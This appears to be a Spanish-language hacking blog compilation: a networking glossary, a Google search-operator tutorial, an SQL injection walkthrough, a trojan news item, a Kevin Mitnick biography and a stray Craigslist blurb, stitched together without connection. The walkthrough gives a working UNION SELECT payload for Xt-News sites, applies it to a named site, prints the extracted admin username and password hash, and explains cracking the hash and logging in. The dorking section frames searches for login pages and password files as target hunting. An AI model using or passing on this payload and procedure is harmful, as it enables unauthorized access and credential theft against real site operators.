Bueno para empezar aqui les traigo unos terminos que necesitan saber, es tan solo un glosario para newbe’s creo que es vastante interesante espero les guste 
A
ADMINISTRADOR DE UNA WEB
Operador del sistema de un sitio Web.
ANCHO DE BANDA
Medida de capacidad de comunicacion o velocidad de transmision
de datos de un circuito o canal.
ARRASTRAR Y COLOCAR
Concepto de GUI (Interfaz grafica de usuario) que permite
seleccionar un objeto de la pantalla y pasarlo como entrada a
otro objeto (icono).
B
BACKBONE
Red de banda ancha para conexiones entre conmutadores.
BANDA AMPLIA
Ruta/circuito de comunicaciones de capacidad media. Suele
indicar una velocidad de 64000 bps a 1544 Mbps.
BANDA ANCHA
Ruta/circuito de comunicaciones de gran capacidad. Normalmente
implica una velocidad superior a 1544 Mbps.
BASE DE DATOS
Conjunto de informacion para varios usuarios. Suele admitir la
seleccion de acceso aleatorio y multiples “vistas” o niveles
de abstraccion de los datos subyacentes.
BAUDIO
(termino antiguo que se esta reemplazando por bps - bits
por segundo):
Numero de elementos de se¤alizacion que pueden transmitirse
por segundo en un circuito.
BIT
Cantidad de informacion mas peque¤a que puede transmitirse.
Una combinacion de bits puede indicar un caracter alfabetico,
un digito, una se¤al, un modificador u otras funciones.
BOT
“bot” es el termino coloquial para programas que escuchan una
conversacion y responden en un canal IRC.
BPS
Bits por segundo. Medida de velocidad de un modem.
BBS (Sistema de boletin electronico)
Boletin electronico en el que los usuarios pueden dejar
mensajes. En muchos BBS es necesario ser miembro de ellos.
C
CANAL
Via (canalizacion) de telecomunicaciones con una determinada
capacidad (velocidad) entre dos ubicaciones de una red.
CAPACIDAD
La mayor velocidad de transmision posible (fiable) que puede
darse en un canal, un circuito o una pieza de equipo. La
capacidad puede expresarse como la velocidad bruta o como el
rendimiento neto.
CATV
Television por cable - Television por antena comunitaria. Un
sistema de television comunitaria, servida por cable y
conectada a una antena (o grupo de antenas) comun. La
legislacion federal de EE.UU. de 1994 permite a los
proveedores de CATV competir por servicios telefonicos (en la
superautopista de la informacion).
CERN
European Laboratory for Particle Physics, el sitio donde se
celebro la primera conferencia sobre World Wide Web y
considerado el lugar de nacimiento de la tecnologia de WWW. El
trabajo sobre la tecnologia de WWW y la elaboracion de
estandares se ha trasladado a la World Wide Web Organization
(W3O, en w3.org). http://www.cern.ch/
CGI (Interfaz de gateway comun)
Interfaz para programadores que crean archivos de comandos o
aplicaciones que se ejecutan internamente en un servidor de
Web. Estos archivos de comandos pueden generar texto y otros
tipos de datos de forma inmediata, en respuesta a una entrada
del usuario, o bien tomando la informacion de una base de
datos.
CIBERESPACIO
Termino utilizado originalmente en la novela “Neuromante”, de
Willian Gibson, sobre redes de equipos informaticos en el
cerebro. Se refiere al campo colectivo de la comunicacion
asistida mediante equipos informaticos.
COMPRESIÓN/DESCOMPRESION
Metodo para cifrar/descifrar se¤ales que permite transmitir (o
almacenar) mas informacion de la que, de otro modo, podria
aceptar el soporte.
CONEXION
Ruta de comunicaciones dedicada punto a punto o conmutada.
CONVERSACION
Termino que se utiliza para describir una conferencia en
tiempo real. Las salas de conversaciones IRC, “WebChat”,
prodigy y aol son ejemplos de “conversacion”.
CUELLO DE BOTELLA
Limite en la capacidad del sistema que puede reducir el
trafico en condiciones de sobrecarga.
D
DIGITAL
Dispositivo o metodo que utiliza variaciones discretas en
voltaje, frecuencia, amplitud, ubicacion, etc. para cifrar,
procesar o transportar se¤ales binarias (0 o 1) para datos
informaticos, sonido, video u otra informacion.
DIRECCION
Codigo exclusivo asignado a la ubicacion de un archivo
almacenado, un dispositivo en un sistema o red, o cualquier
origen de datos de una red.
DIRECCION IP
Direccion de 32 bits del protocolo Internet asignada a un
host. La direccion IP tiene un componente del host y un
componente de la red.
DIRECCION URL (Uniform Resource Locator)
Formato de las direcciones de sitios que muestra el nombre del
servidor en el que se almacenan los archivos del sitio, la
ruta de acceso al directorio del archivo y su nombre.
E
EXPLORADOR
Programa de aplicacion que proporciona una interfaz grafica
interactiva para buscar localizar, ver y administrar la
informacion a traves de una red.
F
FAQ
Preguntas mas frecuentes.
FINGER
Protocolo que permite localizar informacion sobre los usuarios
en la red del host. Algunas redes no permiten su uso desde un
sistema externo, y otras no lo permiten en absoluto.
“FLAME WAR”
Apasionado debate en linea en el que no se incluye la
politica.
FTP (Protocolo de transferencia de archivos)
Protocolo utilizado para transferir archivos a traves de una
amplia variedad de sistemas.
G
GATEWAY
Conversor de protocolos. Nodo especifico de la aplicacion que
conecta redes que de otra forma serian incompatibles.
Convierte codigos de datos y protocolos de transmision que
permiten la interoperatividad.
GIF
Formato de intercambio de graficos. GIF es un formato estandar
para archivos de imagenes en WWW. El formato de archivos GIF
es muy comun, ya que utiliza un metodo de compresion para
reducir los archivos.
GOPHER
Programa de busqueda y exploracion de bases de datos publicas
en Internet.
GUI
Interfaz grafica de usuario.
H
HIPERMEDIO
Metodo para presentar informacion en unidades discretas, o
nodos, que estan conectados mediante vinculos. La informacion
puede presentarse utilizando distintos medios, como
documentacion ejecutable, de texto, graficos, audio, video,
animacion o imagen.
HIPERTEXTO
Describe un tipo de funcionalidad de exploracion en linea
interactiva. Los vinculos (direcciones URL) incrustados en
palabras o frases permiten al usuario seleccionar texto (p.
ej. haciendo clic con el mouse) y mostrar inmediatamente
informacion relacionada y material multimedia.
HIPERVÍNCULO
Conexiones entre una informacion y otra.
HTML (Hypertext Markup Language)
Lenguaje de “etiquetas” en el que se asigna formato a las
paginas de Web y se distribuye la informacion.
HTTP (Protocolo de transferencia de hipertexto)
Metodo mediante el que se transfieren documentos desde el
sistema host o servidor a los exploradores y usuarios
individuales.
I
IP (Protocolo Internet)
Define la unidad de informacion enviada entre sistemas, que
proporciona un servicio de entrega de paquetes basico.
ISDN (Red digital de servicios integrados)
(Tambien llamada RDSI) Juego de normas de la transmision a
gran velocidad de informacion simultanea de voz, datos e
informacion a traves de menos canales de los que serian
necesarios de otro modo, mediante el uso de la se¤alizacion
fuera de banda.
J
JPEG
Joint Photographic Experts Group. Se trata de un conocido
metodo para comprimir imagenes fotograficas. Muchos
exploradores del Web aceptan imagenes JPEG como el formato de
archivo estandar para la visualizacion.
L
LINEA DEDICADA
Linea privada alquilada a una empresa de telecomunicaciones.
LISTSERV
“ListServ” es un programa gratuito para automatizar el
mantenimiento y la entrega de listas de correo electronico.
Hay listas de muchos temas; algunas son “abiertas” (cualquier
persona de la lista puede enviar un mensaje a toda la lista,
como en una conversacion) y otras “cerradas” (solo
determinadas personas pueden enviar informacion a ellas).
SITIO
Ubicacion de la direccion de un servidor en Internet.
M
MODEM (Modulador-Desmodulador)
Conexion del equipo del usuario final que permite transmitir
datos digitales a traves de dispositivos de transmision
analogicos, como las lineas telefonicas.
MPEG
Moving Pictures Expert Group. Se trata de un modo estandar de
comprimir video de imagenes en movimiento.
MULTIMEDIA
Sistemas informaticos que integran audio, video y datos.
N
NCSA
El National Center for Supercomputing Applications es una
institucion de formacion. El explorador de Web Mosaic se creo
aqui. http://www.ncsa.uiuc.edu/
P
PAGINA
Documento de hipermedia en el Web.
PKZIP
PKZIP es una utilidad compartida de compresion para PCs. Para
descomprimir estos archivos se utiliza un programa llamado
PKUNZIP.
“POP” (punto de presencia)
Conexion de acceso telefonico de los proveedores de servicios
de Internet para usuarios de modem, que se utiliza
principalmente para describir conexiones locales, de forma que
los usuarios no tengan que hacer llamadas de larga distancia.
Por ejemplo, un determinado ISP puede tener su base en San
Jose, pero tener “POP” en Los Angeles y Nueva York.
PORTADORA
Proveedor de telecomunicaciones que posee su propio equipo de
conmutacion de redes.
PORTADORA COMÚN
(Empresa de telecomunicaciones) Portadora que sirve al publico
(o a un segmento de el) de forma indiscriminada (es decir, sin
tener en cuenta la identidad del cliente y sin discriminacion
indebida).
PPP (Protocolo punto a punto)
Conexion a Internet de acceso telefonico que utiliza el
protocolo TCP/IP; algo mas rapido que SLIP.
PRINCIPAL
Primera pagina de un sitio, que contiene informacion de
identificacion y un indice.
PRIVILEGIOS DE ACCESO
Privilegio para tener acceso a carpetas y hacer cambios en
ellas.
PUNTERO
Direccion URL incrustada en los datos que especifica su
ubicacion en otro registro o archivo. El hipervinculo es un
ejemplo de puntero.
R
RED
Sistema de elementos interrelacionados que se conectan
mediante un vinculo dedicado o conmutado para proporcionar una
comunicacion local o remota (de voz, video, datos, etc.) y
facilitar el intercambio de informacion entre usuarios con
intereses comunes.
ROBOT
Los “Robots” suelen mencionarse en el contexto de WWW como
programas que se mueven por el Web buscando informacion; por
ejemplo, para crear indices en dispositivos de busqueda o
localizar errores en sitios Web o funciones similares.
S
SEGURIDAD
Mecanismos de control que evitan el uso no autorizado de
recursos.
SEÑAL
Cambio de estado orientado a eventos (p. ej. un tono, cambio
de frecuencia, valor binario, alarma, mensaje, etc.).
SERVIDOR
En una red, estacion host de datos que proporciona servicios a
otras estaciones.
SERVIDOR DE ARCHIVOS
Sistema informatico que permite a usuarios remotos (clientes)
tener acceso a archivos.
SGML
Standard Generalized Markup Language. Lenguaje para la
descripcion de otros lenguajes de documentos estructurales
basados en etiquetas. Por ejemplo, el HTML esta definido
mediante el SGML.
SLIP (Protocolo Internet de linea en serie)
Conexion de acceso telefonico a Internet que utiliza el
protocolo TCP/IP.
SOPORTE
Formato de distribucion y almacenamiento de informacion (p.
ej. cinta de video, disquete, disco optico, impresora, etc.).
Una ampliacion de la capacidad de comunicacion de la
humanidad. Es el mensaje.
SSL
Nivel de socket de seguridad. Protocolo que utiliza Netscape
para proporcionar transacciones seguras a traves de la red.
SUPERAUTOPISTA DE LA INFORMACION
Una palabra de moda (vease tambien media, hiper…). Hace
referencia al plan de la administracion de Clinton/Gore para
liberalizar los servicios de comunicacion, permitiendo la
integracion de todos los aspectos de Internet, CATV, telefono,
empresas, ocio, proveedores de informacion, educacion, etc.
T
TCP/IP
Protocolo de control de transmisiones/Protocolo Internet. Es
el protocolo estandar de comunicaciones en red utilizado para
conectar sistemas informaticos a traves de Internet.
TELNET
Programa de red que ofrece una forma de conectarse y trabajar
desde otro equipo. Al conectarse a otro sistema, los usuarios
pueden tener acceso a servicios de Internet que quizas no
tengan en sus propios equipos.
TIEMPO REAL
Rapida transmision y proceso de datos orientados a eventos y
transacciones a medida que se producen, en contraposicion a
almacenarse y retransmitirse o procesarse por lotes.
TRANSFERIR
Trasladar programas o datos de equipos informaticos a
dispositivos conectados, normalmente de servidores a PCs.
U
UNZIP
Descomprimir o expandir un archivo que se habia reducido
mediante una utilidad de compresion.
USENET (USEer NETwork) Grupos de debate de Internet. Uno de los primeros formatos de
“correo electronico colectivo”. Actualmente hay unos 10000
grupos de debate diferentes.
V
VINCULO DE COMUNICACIONES
Sistema de equipo y programas que conecta a dos usuarios
finales.
VRML - Virtual Reality Modeling Language
Lenguaje de “etiquetas” en el que las paginas de Web estan formateadas para permitir graficos en 3D y la exploracion
espacial interactiva.
W
WAIS (Wide Area Information Server)
Potente sistema para buscar grandes cantidades de informacion
muy rapidamente en Internet.
WAV
“wav” es la extension que utilizan algunos archivos de audio.
WINZIP
Winzip es un utilidad de compresion que permite a los usuarios
de Windows 95, 3.1 y NT reducir el tama¤o de sus archivos para transferirlos mas rapidamente a traves de Internet. Esta
utilidad tambien descomprime archivos comprimidos con formatos PKZIP o TAR. http://www.winzip.com/winzip/
WWW (World Wide Web)
Sistema de Internet para vincular mediante hipertexto en todo
el mundo documentos multimedia, permitiendo un facil acceso,
totalmente independiente de la ubicacion fisica, a la
informacion comun entre documentos.
Z
ZIP
Al “comprimir” (es decir, hacer una copia de menor tama¤o,
pero igual) un archivo mediante “pkzip”, el archivo resultante
se denomina un archivo “zip”. Suele terminar con la extension
“.zip”.
- Introducción
Bien, espero que todos conozcan google: www.google.com. Google, sin miedo a equivocarme, es el motor de búsqueda más usado, y el que mejor funciona, en todo el mundo.
Como espero que sepan, las búsquedas en google.com se realizan en el TxtBox:
Google tiene algo parecido a unos comandos, son palabras clave para sus búsquedas. Nosotros, en este tutorial, usaremos las más normales y básicas para encontrar buena información.
Define: Este, creo que es el comando que más he utilizado en toda mi vida, este comando da una definición de la palabra que viene después. Define:palabra_a_definir por ejemplo Define:ARP.
Allinurl: Este comando mostrará todas las páginas indexadas del dominio escrito en la búsqueda, también mostrará las páginas que tenganlas palabras buscadas en la direcciónURL: allinurl:www.elhacker.org si no pueden probar con allinurl:/login.asp y encontrarán todo tipo de webs que contengan esa página, recuerdan SQL injection? 
Site: Este comando hará que la búsqueda sólo tenga lugar en el sitio indicado. Su sinopsis es muy simple: site:www.elhacker.org batch, el motor de búsqueda, buscará todos los textos con la palabra batch, únicamente en la página www.elhacker.org
Info: Realmente este comando puede resultar bastante útil, puesto a que da información acerca de la página que viene a continuación: info:www.elhacker.org
Intitle: Este comando, funciona de la siguente forma: intitle:index of lo que hace es buscar cualquier título de la web. Para que lo comprendan mejor. Si miran arriba de su navegador, verán como título: BlogDelHacker - Por lo menos eso es lo que veo yo en estos momentos 
-
Filetype: Para este comando, se debe especificar un tipo de extensión para que la búsqueda tenga su efecto. Me explico mejor, supongamos que ustedes quieren descargarse algún pdf de hacking… ustedes pueden poner: filetype:pdf hacking en el resultado, obtendrán como direcciones URL: www.dominio.com/path/hacking.pdf. Esto puede ser útil para buscar archivos de password, .dat entre otros ;).
Existen más comandos, pero con estos nos valdrá para este primero manual.
Ahora podemos realizar varias búsquedas con google, abriendo su website diversas formas y hacer búsquedas específicas de forma que podamos encontrar resultados realmente claves.
Bien la primera parte ha sido realmente corta, pero de igual forma, espero que hayan aprendido algo si no es así, usen google.
Bueno esta vulneravilidad consiste en una injecction SQL.
Para empezar si quieres buscar vulneravilidades Xt-News Tienes que tipear esto en google.
“Powered by Xt-News”
Resultado de la busqueda en google:
http://www.google.com.mx/search?client=firefox-a&rls=org.mozilla%3A%3Aofficial&channel=s&hl=es&q=Powered+by+XtNews&meta=&btnG=Buscar+con+Google
Ahora escogemos alguna web la que sea.
En mi caso escogi esta: http://polyrando.org/xtnews/print.php?id_news=206
Ahora lo que bamos a haces es coger nuestra SQL injecction que es la siguiente:
show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1
Ahora pegamos eso en nuetro navegador,Pero antes tienes que borrar print.php?id_news=206
Entonces nuestra url quedara asi:
http://polyrando.org/xtnews/show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1
Ahora como vemos nos dira el user de admin: webmaster
Y nos dira una hash la cual es el password: 511131faa0a1abe83057f52dc61d40e2
ahora solo falta crackear el password con algun md5
Aqui les dejo uno: http://rapidshare.com/files/40519889/mdcrack.rar
Ahora lo que tienen que haces es descomprimir el mdcrack en su HD.
Y quedara asi:
C/mdcrack
ahora para ejecutarlo van a la consola o ms-dos o cmd
y tipeamos esto
c:/mdcrack/mdcrack.exe <AKI IRA LA HASH>
c:/mdcrack/mdcrack.exe 511131faa0a1abe83057f52dc61d40e2
damos enter.
Esperamos a que nos de el password y para loguearnos tenemos que haces esto.
http://polyrando.org/xtnews/admin/
Solo tenemos que poner despues del ultimo / [admin] y directamente nos mandara a loguearnos como admin y tipeamos el user y el password.
Si encuentran muy dificil la parte de obtener el hash pueden hacerlo de forma online desde la web www.milw0rm.com
Bueno eso es todo.
Piratas informáticos usan el iPhone para propagar Virus
Según el informe semanal de Panda Software, existe un nuevo virus / troyano / gusano, denominado Aiphone.A que aprovecha todo el revuelo causado por la venta en línea del nuevo celular producido por la gente de Steve Jobs.
El éxitoso iPhone, creado por Apple, que en su salida a la venta, ha reportado más de un millón de unidades vendidas, sólo en Estados Unidos. Debido a estó, ha sido el objetivo del creador de este malware, quien ha decidido robar datos bancarios utilizando lo último en ingeniería social.
Este troyano, penetra a nuestros sistemas como un objeto de ayuda al navegador (BHO según sus siglas en ingles). La forma más común como afecta es vía archivo anexo en un correo electrónico o archivos infectados descargados desde internet. Una vez alojado, muestra su verdadero ingenio, y está provista de varias herramientas, cada una diseñada para obtener nuestra información bancaria por diferentes formas.
Utilizando la técnica denominada Redirects Admin, cuyo objetivo es redirigirnos a una página falsa de iPhone, si introducimos en nuestro navegador, las direcciones de las páginas oficiales de iPhone.
Una segunda alternativa para este troyano, es el uso de Search Redir, donde al nosotros iniciar una busqueda, en cualquier directorio o buscador que usemos, los primeros resultados de las busquedas solicitadas tendran la dirección de la mencionada página falsa.
Por si esto no es suficiente, queda la técnica Inject Admin, que busca sustituir en la página que estemos visitando, la publicidad o link que este relacionado con el iPhone, por un enlace hacia la página falsa.
Este virus, mezcla el uso de los troyanos (malware), con técnicas phishing (página falsa) y adware (resultados de busqueda modificadas, pop-up relacionados al iphone), ocasionando una alta probabilidad de poder adquirir la información bancaria del usuario.
Kevin David Mitnick, autoapodado como “Condor” por la película de espionaje Los tres días del Condor, es, sin duda, uno de los hackers más conocido del mundo. Su vida como Hacker comenzó desde muy pequeño, ya que desde siempre tuvo una gran curiosidad por los sistemas de comunicación electrónica y se autoalimentó un deseo, quizas algo obsesivo por conocer cosas y ser capaz de lograr objetivos casi imposibles.
Un poco más mayor fue cuando comenzó su vida como Cracker, ya que consiguió tener una gran habilidad para robar información, ingresar en servidores sin autorización, crear virus, interceptar teléfonos, etc. Muestra de ello, fueron sus ataques a empresas como Novell, Motorola, Nokia y Sun Microsystem, el Pentágono, el FBI y la Universidad de Southern en California.
De todos ellos el que le llevó a prisión fue el del FBI. Robó informaciones que llevaron al gobieron estadounidense a mudar todos sus centros secretos de comunicación a sitios inaccesibles y al FBI a gastarse millones de dólares. Se convirtió por 3 años en un fugitivo de la justicia, hasta ser capturado por el FBI en el 1995. A raiz de eso pasaría casi 5 años en prisión. Gracias a esto se convirtió en un Símbolo entre la comunidad internacional de crackers.
La Juez del U.S. District, cuando Mitnick fue liberado en el año 2000, le prohibió todo contacto con computadores, televisión, teléfonos celulares o cualquier otro dispositivo electrónico que pudiera ser usado a través de internet hasta un periodo de 3 años y pensó que Mitnick no obtendría ningún recurso económico por encima del salario mínimo.
Devido a su popularidad en este periodo, interpretó en la serie Alisa un papel como agente de la CIA, y nada más salir de prisión Mitnick ganó 20.000$ por una serie de conferencias sobre seguridad en internet, en un periodo de un mes.
Hoy, el hacker Kevin Mitnick, tiene su propia empresa de Seguridad y Consutloría, Mitnick Security Consulting LCC. Además vende via on-line sus dos “best sellers”: El Arte de la Decepción donde explica la vulnerabilidad de protocolos de encriptación y de los Firewalls; y El Arte de la Intrusión, donde habla de lo importante del “encanto personal” en un hacker.
3- Craiglist.org:Página de clasificados gratuitos en Internet ahora disponibles en másde 200 ciudades del mundo. La revista PCWorld asegura que este serviciohace fuerte competencia a los clasificados tradicionales de los diariosde papel.
